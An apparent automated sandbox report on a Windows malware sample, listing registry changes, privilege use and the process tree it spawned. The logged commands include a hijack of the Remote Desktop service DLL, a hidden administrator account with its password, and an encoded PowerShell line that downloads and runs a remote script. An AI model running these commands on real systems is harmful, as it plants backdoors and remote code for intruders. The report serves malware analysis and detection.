Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3916 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3916 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 1300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3668 wrote to memory of 1300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1300 wrote to memory of 1904 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1300 wrote to memory of 1904 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3668 wrote to memory of 2064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 2064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 2088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 2088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 3848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 3848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 3252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3668 wrote to memory of 3252 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3668 wrote to memory of 2176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3668 wrote to memory of 2176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3668 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3668 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3668 wrote to memory of 2200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3668 wrote to memory of 2200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2200 wrote to memory of 2232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2200 wrote to memory of 2232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3668 wrote to memory of 1072 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3668 wrote to memory of 1072 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1072 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1072 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2156 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1636 wrote to memory of 1832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1636 wrote to memory of 1832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3668 wrote to memory of 1432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3668 wrote to memory of 1432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1432 wrote to memory of 3100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1432 wrote to memory of 3100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3100 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3100 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4000 wrote to memory of 3884 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4000 wrote to memory of 3884 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2668 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2668 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1852 wrote to memory of 368 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1852 wrote to memory of 368 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2332 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2332 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2184 wrote to memory of 3876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2184 wrote to memory of 3876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3840 wrote to memory of 2008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3840 wrote to memory of 2008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2008 wrote to memory of 1636 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 1636 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2064 wrote to memory of 344 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2064 wrote to memory of 344 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 344 wrote to memory of 1168 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 344 wrote to memory of 1168 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1296 wrote to memory of 368 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1296 wrote to memory of 368 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 368 wrote to memory of 3704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 368 wrote to memory of 3704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4056 wrote to memory of 1652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4056 wrote to memory of 1652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1652 wrote to memory of 684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1652 wrote to memory of 684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 424 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 424 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe

"C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zfhdxg5m\zfhdxg5m.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C3D.tmp" "c:\Users\Admin\AppData\Local\Temp\zfhdxg5m\CSCFAC60B4AB7C947009A3AFB3947D1A5FC.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc i0aAay1y /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc i0aAay1y /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc i0aAay1y /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc i0aAay1y

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc i0aAay1y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc i0aAay1y

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

